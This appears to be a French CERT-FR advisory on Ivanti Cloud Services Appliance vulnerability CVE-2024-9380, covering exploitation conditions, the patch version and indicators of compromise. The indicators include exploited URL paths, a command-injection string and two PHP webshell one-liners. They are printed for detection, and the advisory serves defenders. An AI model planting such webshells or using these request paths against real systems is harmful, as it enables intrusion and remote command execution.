Ivanti CSA - CVE-2024-9380

Exécution de code arbitraire

La vulnérabilité exploitée est du type
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

Détails sur l'exploitation
•    Vecteur d'attaque : Réseau
•    Complexité de l'attaque : Faible
•    Privilèges nécessaires pour réaliser l'attaque : Authentification utilisateur privilégié
•    Interaction d'un utilisateur ayant accès au produit est-elle nécessaire : Non
•    L'exploitation de la faille permet d'obtenir des droits privilégiés : Non

Preuve de concept
Actuellement, aucune preuve de concept n'est disponible en sources ouvertes.

Mettre à jour Ivanti Cloud Services Appliance vers la version 5.0.2 ou ultérieure.
Des informations complémentaires sont disponibles dans le bulletin d’Ivanti.

Recherche de compromission

Le CERT-FR recommande de rechercher dans les journaux d’activité les éléments suivants à partir du 4 septembre :

• Des requêtes HTTP GET vers l’URL "/client/index.php%3F.php/gsb/users.php" (exploitation de la CVE-2024-8963),
Cette URL a été massivement requêtée lors de tentatives d’attaques opportunistes. Sa présence dans les
journaux d’activité n’est donc pas necessairement signe d’une compromission réussie.
• Des requêtes HTTP POST vers l’URL "/gsb/datetime.php" (exploitation de la CVE-2024-8190),
• La présence de "PGPASSWORD" pouvant indiquer la manipulation de la base de données contenant les informations de
connexion,
• La présence d’une requête "tripwire --update ;" indiquant une injection de commandes via la page reports.php.

Les attaquants semblent également utiliser des webshells PHP situées dans le dossier /opt/landesk. Il est recommandé de
rechercher les instructions suivantes :

• <?php @eval($_REQUEST[<variable>]); ?>
• <?php system('/bin/sudo '. $_REQUEST[<variable>]);